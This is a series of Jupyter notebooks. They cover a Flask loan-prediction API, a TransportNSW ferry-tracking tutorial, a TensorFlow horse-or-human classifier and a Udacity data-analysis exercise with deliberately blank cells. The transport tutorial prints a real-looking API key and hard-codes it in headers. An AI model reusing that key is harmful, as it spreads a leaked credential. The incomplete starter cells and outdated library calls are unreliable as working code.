HTTP messages are made of a header and a body. As a standard, the majority of the body content sent across is in **`json`** format. We'll be sending (**`POST url-endpoint/`**) the incoming data as a batch to get predictions.

(__NOTE:__ You can send plain **text, XML, csv or image** directly, but for the sake of interchangeability of the format, it is advisable to use **`json`**)

```python
"""Filename: server.py"""
import os
import pandas as pd
import dill as pickle               # used below to load the serialized model
from sklearn.externals import joblib
from flask import Flask, jsonify, request

app = Flask(__name__)

@app.route('/predict', methods=['POST'])
def apicall():
    """API Call

    Pandas dataframe (sent as a payload) from API Call
    """
    try:
        test_json = request.get_json()
        test = pd.read_json(test_json, orient='records')

        # To resolve the issue of TypeError: Cannot compare types 'ndarray(dtype=int64)' and 'str'
        test['Dependents'] = [str(x) for x in list(test['Dependents'])]

        # Getting the Loan_IDs separated out
        loan_ids = test['Loan_ID']

    except Exception as e:
        raise e

    clf = 'model_v2.pk'

    if test.empty:
        return(bad_request())
    else:
        # Load the saved model
        print("Loading the model...")
        loaded_model = None
        with open('./models/'+clf, 'rb') as f:
            loaded_model = pickle.load(f)

        print("The model has been loaded...doing predictions now...")
        predictions = loaded_model.predict(test)

        """Add the predictions as Series to a new pandas dataframe
        OR
        Depending on the use-case, the entire test data appended with the new files
        """
        prediction_series = list(pd.Series(predictions))
        final_predictions = pd.DataFrame(list(zip(loan_ids, prediction_series)))

        """We can be as creative in sending the responses.
        But we need to send the response codes as well.
        """
        responses = jsonify(predictions=final_predictions.to_json(orient="records"))
        responses.status_code = 200

        return (responses)
```

Once done, run: `gunicorn --bind 0.0.0.0:8000 server:app`

Let's generate some prediction data and query the API running locally at `http://0.0.0.0:8000/predict`
###Code
import json
import requests
"""Setting the headers to send and accept json responses
"""
header = {'Content-Type': 'application/json',
'Accept': 'application/json'}
"""Reading test batch
"""
df = pd.read_csv('../data/test.csv', encoding="utf-8-sig")
df = df.head()
"""Converting Pandas Dataframe to json
"""
data = df.to_json(orient='records')
data
"""POST <url>/predict
"""
resp = requests.post("http://0.0.0.0:8000/predict", \
data = json.dumps(data),\
headers= header)
resp.status_code
"""The final response we get is as follows:
"""
###Output
_____no_output_____ |
Notebook #15b - API.ipynb | ###Markdown
Week 8: Introduction to APIs

Aims: This exercise aims to introduce you to web APIs and get you familiar with accessing them via Python. The objectives are:

- Send a simple API request
- Understand the status codes
- Send an API request with authentication
- Parse the returned data
- Plot the data to create a map!

At the end of this tutorial you should be fairly confident to go on and explore other APIs and be able to move on to more complex methods of authentication such as 'OAuth'.

Installing the basics: Before we connect to some APIs we need libraries which enable Python to connect to them and send/receive data from them. The library we will use is called `requests`. Install the library and load it by running the commands below.
###Code
# Install a packages requried for the current tutorial
import sys
!{sys.executable} -m pip install -q requests
!{sys.executable} -m pip install -q google
!{sys.executable} -m pip install -q google-api-python-client
!{sys.executable} -m pip install -q gtfs-realtime-bindings
!{sys.executable} -m pip install -q pandas
!{sys.executable} -m pip install -q geopandas
!{sys.executable} -m pip install -q matplotlib
!{sys.executable} -m pip install -q folium
# Import the installed packages into current environment
import requests
import folium
import time
import pandas
import geopandas
from google.transit import gtfs_realtime_pb2
from shapely.geometry import Point
from IPython import display
###Output
_____no_output_____
###Markdown
Now we are all set. Let's explore some web APIs! Connecting to your First API: let's jump-start things by connecting to an API and downloading some data. We will use TransportNSW's live vehicle position API, available here: https://opendata.transport.nsw.gov.au/dataset/public-transport-realtime-vehicle-positions. Okay, let's send our first GET query!
###Code
# Create a result object with the Transport API
result = requests.get('https://api.transport.nsw.gov.au/v1/gtfs/vehiclepos/ferries/sydneyferries')
###Output
_____no_output_____
###Markdown
Wait! You must be wondering why there is nothing here and what happened. Basically, we have created the object successfully; no error message is good news here. Now let's examine the resulting object closely. The first thing we need to check is the `Status Code` of the result. This code says how successful the API request has been.
###Code
result.status_code
###Output
_____no_output_____
###Markdown
Hmm, that's cryptic... Basically every code here corresponds to a certain status; the common ones are given below.

Code | Status | Description
---|---|---
200 | OK | The request was successfully completed.
201 | Created | A new resource was successfully created.
400 | Bad Request | The request was invalid.
401 | Unauthorized | The request did not include an authentication token or the authentication token was expired.
403 | Forbidden | The client did not have permission to access the requested resource.
404 | Not Found | The requested resource was not found.
405 | Method Not Allowed | The HTTP method in the request was not supported by the resource. For example, the DELETE method cannot be used with the Agent API.
409 | Conflict | The request could not be completed due to a conflict. For example, POST ContentStore Folder API cannot complete if the given file or folder name already exists in the parent location.
500 | Internal Server Error | The request was not completed due to an internal error on the server side.
503 | Service Unavailable | The server was unavailable.

Our status code is 401, showing that we have a problem related to authentication. Let's print the text sent along with the response to see what the problem has been.
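If you want code to react to these status codes rather than just reading them by hand, the `requests` response object exposes them directly; a small sketch reusing the `result` object from the cell above:

```python
# Branch on the status code instead of inspecting it manually
if result.status_code == 200:
    print("Success - safe to parse the body.")
elif result.status_code == 401:
    print("Unauthorized - this API probably needs an API key.")
else:
    # raise_for_status() raises requests.HTTPError for any other 4xx/5xx response
    result.raise_for_status()
```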
###Code
result.text
###Output
_____no_output_____
###Markdown
That's a lot of information! You can see that the text in the result object is in `JSON` (JavaScript Object Notation) format. If we parse it properly, we can query components of this object without printing everything.
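Once parsed, the standard `json` module can pretty-print the whole structure, which is handy when exploring an unfamiliar response; a small sketch reusing the `result` object from above:

```python
import json

# Parse the JSON body and print it with indentation for readability
parsed = result.json()
print(json.dumps(parsed, indent=2))
```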
###Code
# Parse the result
result_json = result.json()
# Print just the error message
result_json['ErrorDetails']['Message']
###Output
_____no_output_____
###Markdown
So basically, our API request has been rejected since it had no authentication details. Most API providers will restrict the use of their APIs (even open ones) to avoid abuse. We might have to create an account and get authentication details to use this API. Authenticating with an API key: for this class I have already signed up with the TransportNSW developer website, created an application and generated an API key. The key is `CGrnUTmzoaCL57n9TzoseFqUb22Pqz32m1eB`. Now we have to send this key in the header of the request.
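Hard-coding a key in a notebook (as done below for convenience) is not good practice outside a classroom; keys are usually read from an environment variable instead. A minimal sketch, where `TRANSPORT_API_KEY` is just an assumed variable name:

```python
import os

# Read the API key from an environment variable instead of hard-coding it.
# 'TRANSPORT_API_KEY' is only an assumed name for this sketch.
api_key = os.environ.get('TRANSPORT_API_KEY', '<your-api-key>')
headers = {'Authorization': 'apikey ' + api_key}
```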
###Code
# Create a headers object
headers = {'Authorization' : 'apikey CGrnUTmzoaCL57n9TzoseFqUb22Pqz32m1eB'}
# Create a request with the headers
result = requests.get(url='https://api.transport.nsw.gov.au/v1/gtfs/vehiclepos/ferries/sydneyferries', headers=headers)
# Check the status
result.status_code
###Output
_____no_output_____
###Markdown
Yay! That has worked... Let's start to explore the data that has been sent back.
###Code
# Print the first 20 whitespace-separated tokens of the raw text
# The command looks complicated but you can also do
# print(result.text) to get all the results
' '.join(str.split(result.text)[:20])
###Output
_____no_output_____
###Markdown
That is not helpful at all... The format of the returned data is `protobuf` (Protocol Buffers), which is used to compress the data sent back and forth by APIs, especially realtime ones like this. Now we need to parse and understand the result that has been sent back. Parsing GTFS-realtime data: as we saw before, GTFS-realtime data is in protobuf format, which needs to be parsed into a Python object so that we can plot it on a map. We need to create a feed object from the gtfs_realtime_pb2 package which can parse the result.
###Code
# creating a feed object
feed = gtfs_realtime_pb2.FeedMessage()
# Use the feed object to parse the result of the API
feed.ParseFromString(result.content)
# Print the results
feed.entity[0]
###Output
_____no_output_____
###Markdown
If all of these feed objects and parsing sound complicated, it's alright. All you need to know is that different APIs return data in different formats, and you need to convert them in Python to be able to make sense of them. Now we have successfully translated the data into a format we can read! Let's convert it into a tabular format. The code below should create a table from the API data with the ID, latitude and longitude of each vehicle.
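As an aside, the row-by-row `concat` used below works, but for large feeds the more idiomatic pandas pattern is to build a list of records first and construct the DataFrame once. A hedged alternative sketch, assuming the same `feed` object:

```python
# Build a list of plain dicts, then construct the DataFrame in one go
records = [
    {
        'id': entity.id,
        'lat': float(entity.vehicle.position.latitude),
        'lng': float(entity.vehicle.position.longitude),
    }
    for entity in feed.entity
]
data = pandas.DataFrame(records, columns=['id', 'lat', 'lng'])
```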
###Code
data = pandas.DataFrame()
for i in feed.entity :
row = pandas.Series([i.id,float(i.vehicle.position.latitude),float(i.vehicle.position.longitude)])
row_df = pandas.DataFrame([row])
data = pandas.concat([data,row_df],ignore_index=True)
data.columns = ['id','lat','lng']
data
###Output
_____no_output_____
###Markdown
Plotting the API on a Map. We have the data from TransportNSW in a tabular format. The next step is to convert it into a geographic data format and visualise it in real time. Geographic data has three components: geometry, attributes and a coordinate reference system (CRS). We already have the attributes in the form of the table; now we need to create the CRS and the geometry. The code below does both.
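A practical note on the CRS: latitude/longitude (EPSG:4326) is an angular system, so it is not suitable for measuring lengths or areas in metres; for that kind of analysis the GeoDataFrame created below is usually reprojected first. A minimal hedged sketch of the call, using Web Mercator (EPSG:3857) purely as an example target:

```python
# Reproject the GeoDataFrame (built in the next cell) to a projected CRS
projected = geo_data.to_crs('epsg:3857')
print(projected.crs)
```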
###Code
# Create a simple CRS string - 4326 is WGS84, i.e. plain latitude/longitude coordinates.
crs = 'epsg:4326'
# We create the geometry from the lat, lng columns of the table
geometry = [Point(xy) for xy in zip(data['lng'],data['lat'])]
geo_data = geopandas.GeoDataFrame(data,crs=crs,geometry=geometry)
# We convert the geodata into JSON format so that it can be mapped easily
geo_json = geo_data.to_json()
###Output
_____no_output_____
###Markdown
Now we have all that is needed to make an interactive map! The `geo_json` object can now be added on top of a base map using the `folium` library as shown below,
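Once built, a folium map can also be written out as a standalone HTML file, which is handy for sharing the result outside the notebook. A one-line sketch (the filename is only an example), assuming the map object `m` created in the next cell:

```python
# Write the interactive map to a self-contained HTML file
m.save('ferries_map.html')
```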
###Code
# Create a base map with the specified style, center point and zoom level
m = folium.Map(location=[-33.854504, 151.218034],
tiles='Stamen Toner',
zoom_start=11)
# Add the geo_json to the map as points
m.add_child(folium.features.GeoJson(geo_json))
###Output
_____no_output_____
###Markdown
That's it! We downloaded data from TransportNSW on the real-time location of ferries and made a map out of it, all within 20 minutes! This is how powerful and simple APIs are. They simplify and standardise most of the data dissemination and secondary data collection so that we can focus on our research and analysis. Simple Application using the API: below is an example application using the TransportNSW API. When we combine all the steps we did before into a sequence and repeat them every 5 seconds, we can build a simple monitoring station which shows the real-time location of all the ferries.
###Code
# range(1) runs a single refresh here; increase it to keep the monitor updating
for i in range(1):
result = requests.get(url='https://api.transport.nsw.gov.au/v1/gtfs/vehiclepos/ferries/sydneyferries', headers=headers)
feed = gtfs_realtime_pb2.FeedMessage()
feed.ParseFromString(result.content)
data = pandas.DataFrame()
for i in feed.entity :
row = pandas.Series([i.id,float(i.vehicle.position.latitude),float(i.vehicle.position.longitude)])
row_df = pandas.DataFrame([row])
data = pandas.concat([data,row_df],ignore_index=True)
data.columns = ['id','lat','lng']
geometry = [Point(xy) for xy in zip(data['lng'],data['lat'])]
geo_data = geopandas.GeoDataFrame(data,crs=crs,geometry=geometry)
geo_json = geo_data.to_json()
m = folium.Map(location=[-33.854504, 151.218034],tiles='Stamen Toner', zoom_start=14)
folium_plot = m.add_child(folium.features.GeoJson(geo_json))
display.clear_output(wait=True)
display.display(folium_plot)
time.sleep(5)
###Output
_____no_output_____ |
deep-learning/Tensorflow-2.x/Browser-Based-Models/Course 1 - Part 8 - Lesson 3 - Notebook.ipynb | ###Markdown
The following Python code uses the os library to access the file system, and the zipfile library to unzip the data.
###Code
import os
import zipfile
local_zip = '/tmp/horse-or-human.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('/tmp/horse-or-human')
local_zip = '/tmp/validation-horse-or-human.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('/tmp/validation-horse-or-human')
zip_ref.close()
###Output
_____no_output_____
###Markdown
The contents of the .zip files are extracted to the base directories `/tmp/horse-or-human` and `/tmp/validation-horse-or-human`, which in turn each contain `horses` and `humans` subdirectories. In short: the training set is the data that is used to tell the neural network model that 'this is what a horse looks like', 'this is what a human looks like' etc. One thing to pay attention to in this sample: we do not explicitly label the images as horses or humans. If you remember the handwriting example earlier, we had labelled 'this is a 1', 'this is a 7' etc. Later you'll see something called an ImageGenerator being used -- and this is coded to read images from subdirectories, and automatically label them from the name of that subdirectory. So, for example, you will have a 'training' directory containing a 'horses' directory and a 'humans' one. ImageGenerator will label the images appropriately for you, reducing a coding step. Let's define each of these directories:
###Code
# Directory with our training horse pictures
train_horse_dir = os.path.join('/tmp/horse-or-human/horses')
# Directory with our training human pictures
train_human_dir = os.path.join('/tmp/horse-or-human/humans')
# Directory with our validation horse pictures
validation_horse_dir = os.path.join('/tmp/validation-horse-or-human/horses')
# Directory with our validation human pictures
validation_human_dir = os.path.join('/tmp/validation-horse-or-human/humans')
###Output
_____no_output_____
###Markdown
Now, let's see what the filenames look like in the `horses` and `humans` training directories:
###Code
train_horse_names = os.listdir(train_horse_dir)
print(train_horse_names[:10])
train_human_names = os.listdir(train_human_dir)
print(train_human_names[:10])
validation_horse_names = os.listdir(validation_horse_dir)
print(validation_horse_names[:10])
validation_human_names = os.listdir(validation_human_dir)
print(validation_human_names[:10])
###Output
_____no_output_____
###Markdown
Let's find out the total number of horse and human images in the directories:
###Code
print('total training horse images:', len(os.listdir(train_horse_dir)))
print('total training human images:', len(os.listdir(train_human_dir)))
print('total validation horse images:', len(os.listdir(validation_horse_dir)))
print('total validation human images:', len(os.listdir(validation_human_dir)))
###Output
_____no_output_____
###Markdown
Now let's take a look at a few pictures to get a better sense of what they look like. First, configure the matplot parameters:
###Code
%matplotlib inline
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# Parameters for our graph; we'll output images in a 4x4 configuration
nrows = 4
ncols = 4
# Index for iterating over images
pic_index = 0
###Output
_____no_output_____
###Markdown
Now, display a batch of 8 horse and 8 human pictures. You can rerun the cell to see a fresh batch each time:
###Code
# Set up matplotlib fig, and size it to fit 4x4 pics
fig = plt.gcf()
fig.set_size_inches(ncols * 4, nrows * 4)
pic_index += 8
next_horse_pix = [os.path.join(train_horse_dir, fname)
for fname in train_horse_names[pic_index-8:pic_index]]
next_human_pix = [os.path.join(train_human_dir, fname)
for fname in train_human_names[pic_index-8:pic_index]]
for i, img_path in enumerate(next_horse_pix+next_human_pix):
# Set up subplot; subplot indices start at 1
sp = plt.subplot(nrows, ncols, i + 1)
sp.axis('Off') # Don't show axes (or gridlines)
img = mpimg.imread(img_path)
plt.imshow(img)
plt.show()
###Output
_____no_output_____
###Markdown
Building a Small Model from Scratch. But before we continue, let's start defining the model. Step 1 will be to import tensorflow.
###Code
import tensorflow as tf
###Output
_____no_output_____
###Markdown
We then add convolutional layers as in the previous example, and flatten the final result to feed into the densely connected layers. Finally we add the densely connected layers. Note that because we are facing a two-class classification problem, i.e. a *binary classification problem*, we will end our network with a [*sigmoid* activation](https://wikipedia.org/wiki/Sigmoid_function), so that the output of our network will be a single scalar between 0 and 1, encoding the probability that the current image is class 1 (as opposed to class 0).
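For reference, the sigmoid activation squashes any real-valued score $z$ into the open interval $(0, 1)$:

$$\sigma(z) = \frac{1}{1 + e^{-z}}$$

so large positive scores map towards 1 (the 'humans' class) and large negative scores map towards 0 (the 'horses' class).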
###Code
model = tf.keras.models.Sequential([
# Note the input shape is the desired size of the image 300x300 with 3 bytes color
# This is the first convolution
tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(300, 300, 3)),
tf.keras.layers.MaxPooling2D(2, 2),
# The second convolution
tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The third convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The fourth convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The fifth convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# Flatten the results to feed into a DNN
tf.keras.layers.Flatten(),
# 512 neuron hidden layer
tf.keras.layers.Dense(512, activation='relu'),
# Only 1 output neuron. It will contain a value from 0-1 where 0 for 1 class ('horses') and 1 for the other ('humans')
tf.keras.layers.Dense(1, activation='sigmoid')
])
###Output
_____no_output_____
###Markdown
The model.summary() method call prints a summary of the NN
###Code
model.summary()
###Output
_____no_output_____
###Markdown
The "output shape" column shows how the size of your feature map evolves in each successive layer. The convolution layers reduce the size of the feature maps by a bit due to padding, and each pooling layer halves the dimensions. Next, we'll configure the specifications for model training. We will train our model with the `binary_crossentropy` loss, because it's a binary classification problem and our final activation is a sigmoid. (For a refresher on loss metrics, see the [Machine Learning Crash Course](https://developers.google.com/machine-learning/crash-course/descending-into-ml/video-lecture).) We will use the `rmsprop` optimizer with a learning rate of `0.001`. During training, we will want to monitor classification accuracy.**NOTE**: In this case, using the [RMSprop optimization algorithm](https://wikipedia.org/wiki/Stochastic_gradient_descentRMSProp) is preferable to [stochastic gradient descent](https://developers.google.com/machine-learning/glossary/SGD) (SGD), because RMSprop automates learning-rate tuning for us. (Other optimizers, such as [Adam](https://wikipedia.org/wiki/Stochastic_gradient_descentAdam) and [Adagrad](https://developers.google.com/machine-learning/glossary/AdaGrad), also automatically adapt the learning rate during training, and would work equally well here.)
###Code
from tensorflow.keras.optimizers import RMSprop
model.compile(loss='binary_crossentropy',
optimizer=RMSprop(lr=0.001),
metrics=['acc'])
###Output
_____no_output_____
###Markdown
Data PreprocessingLet's set up data generators that will read pictures in our source folders, convert them to `float32` tensors, and feed them (with their labels) to our network. We'll have one generator for the training images and one for the validation images. Our generators will yield batches of images of size 300x300 and their labels (binary).As you may already know, data that goes into neural networks should usually be normalized in some way to make it more amenable to processing by the network. (It is uncommon to feed raw pixels into a convnet.) In our case, we will preprocess our images by normalizing the pixel values to be in the `[0, 1]` range (originally all values are in the `[0, 255]` range).In Keras this can be done via the `keras.preprocessing.image.ImageDataGenerator` class using the `rescale` parameter. This `ImageDataGenerator` class allows you to instantiate generators of augmented image batches (and their labels) via `.flow(data, labels)` or `.flow_from_directory(directory)`. These generators can then be used with the Keras model methods that accept data generators as inputs: `fit_generator`, `evaluate_generator`, and `predict_generator`.
###Code
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# All images will be rescaled by 1./255
train_datagen = ImageDataGenerator(rescale=1/255)
validation_datagen = ImageDataGenerator(rescale=1/255)
# Flow training images in batches of 128 using train_datagen generator
train_generator = train_datagen.flow_from_directory(
'/tmp/horse-or-human/', # This is the source directory for training images
        target_size=(300, 300),  # All images will be resized to 300x300
batch_size=128,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
# Flow validation images in batches of 32 using validation_datagen generator
validation_generator = validation_datagen.flow_from_directory(
        '/tmp/validation-horse-or-human/',  # This is the source directory for validation images
        target_size=(300, 300),  # All images will be resized to 300x300
batch_size=32,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
###Output
_____no_output_____
###Markdown
Training. Let's train for 15 epochs -- this may take a few minutes to run. Do note the values per epoch. The loss and accuracy are a great indication of the progress of training: the model makes a guess as to the classification of the training data, which is then measured against the known label to calculate the result. Accuracy is the portion of correct guesses.
###Code
history = model.fit_generator(
train_generator,
steps_per_epoch=8,
epochs=15,
verbose=1,
validation_data = validation_generator,
validation_steps=8)
###Output
_____no_output_____
###Markdown
Running the Model. Let's now take a look at actually running a prediction using the model. This code will allow you to choose 1 or more files from your file system; it will then upload them and run them through the model, giving an indication of whether the object is a horse or a human.
###Code
import numpy as np
from google.colab import files
from keras.preprocessing import image
uploaded = files.upload()
for fn in uploaded.keys():
# predicting images
path = '/content/' + fn
img = image.load_img(path, target_size=(300, 300))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
images = np.vstack([x])
classes = model.predict(images, batch_size=10)
print(classes[0])
if classes[0]>0.5:
print(fn + " is a human")
else:
print(fn + " is a horse")
###Output
_____no_output_____
###Markdown
Visualizing Intermediate Representations. To get a feel for what kind of features our convnet has learned, one fun thing to do is to visualize how an input gets transformed as it goes through the convnet. Let's pick a random image from the training set, and then generate a figure where each row is the output of a layer, and each image in the row is a specific filter in that output feature map. Rerun this cell to generate intermediate representations for a variety of training images.
###Code
import numpy as np
import random
from tensorflow.keras.preprocessing.image import img_to_array, load_img
# Let's define a new Model that will take an image as input, and will output
# intermediate representations for all layers in the previous model after
# the first.
successive_outputs = [layer.output for layer in model.layers[1:]]
#visualization_model = Model(img_input, successive_outputs)
visualization_model = tf.keras.models.Model(inputs = model.input, outputs = successive_outputs)
# Let's prepare a random input image from the training set.
horse_img_files = [os.path.join(train_horse_dir, f) for f in train_horse_names]
human_img_files = [os.path.join(train_human_dir, f) for f in train_human_names]
img_path = random.choice(horse_img_files + human_img_files)
img = load_img(img_path, target_size=(300, 300)) # this is a PIL image
x = img_to_array(img)  # Numpy array with shape (300, 300, 3)
x = x.reshape((1,) + x.shape)  # Numpy array with shape (1, 300, 300, 3)
# Rescale by 1/255
x /= 255
# Let's run our image through our network, thus obtaining all
# intermediate representations for this image.
successive_feature_maps = visualization_model.predict(x)
# These are the names of the layers, so can have them as part of our plot
layer_names = [layer.name for layer in model.layers]
# Now let's display our representations
for layer_name, feature_map in zip(layer_names, successive_feature_maps):
if len(feature_map.shape) == 4:
# Just do this for the conv / maxpool layers, not the fully-connected layers
n_features = feature_map.shape[-1] # number of features in feature map
# The feature map has shape (1, size, size, n_features)
size = feature_map.shape[1]
# We will tile our images in this matrix
display_grid = np.zeros((size, size * n_features))
for i in range(n_features):
# Postprocess the feature to make it visually palatable
x = feature_map[0, :, :, i]
x -= x.mean()
x /= x.std()
x *= 64
x += 128
x = np.clip(x, 0, 255).astype('uint8')
# We'll tile each filter into this big horizontal grid
display_grid[:, i * size : (i + 1) * size] = x
# Display the grid
scale = 20. / n_features
plt.figure(figsize=(scale * n_features, scale))
plt.title(layer_name)
plt.grid(False)
plt.imshow(display_grid, aspect='auto', cmap='viridis')
###Output
_____no_output_____
###Markdown
As you can see, we go from the raw pixels of the images to increasingly abstract and compact representations. The representations downstream start highlighting what the network pays attention to, and they show fewer and fewer features being "activated"; most are set to zero. This is called "sparsity." Representation sparsity is a key feature of deep learning. These representations carry increasingly less information about the original pixels of the image, but increasingly refined information about the class of the image. You can think of a convnet (or a deep network in general) as an information distillation pipeline. Clean Up. Before running the next exercise, run the following cell to terminate the kernel and free memory resources:
###Code
import os, signal
os.kill(os.getpid(), signal.SIGKILL)
###Output
_____no_output_____ |
L1_Starter_Code.ipynb | ###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
with open('enrollments.csv', 'rb') as f:
reader = unicodecsv.DictReader(f)
enrollments = list(reader)
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
daily_engagement =
project_submissions =
###Output
_____no_output_____
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
###Output
_____no_output_____
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
###Output
_____no_output_____
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
###Output
_____no_output_____
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print(len(non_udacity_enrollments))
print(len(non_udacity_engagement))
print(len(non_udacity_submissions))
###Output
_____no_output_____
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students =
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week =
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
import numpy as np
# Summarize the data about minutes spent in the classroom
total_minutes = list(total_minutes_by_account.values())
print('Mean:', np.mean(total_minutes))
print('Standard deviation:', np.std(total_minutes))
print('Minimum:', np.min(total_minutes))
print('Maximum:', np.max(total_minutes))
###Output
_____no_output_____
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
###Output
_____no_output_____
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
###Output
_____no_output_____
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
###Output
_____no_output_____
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_engagement =
non_passing_engagement =
###Output
_____no_output_____
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
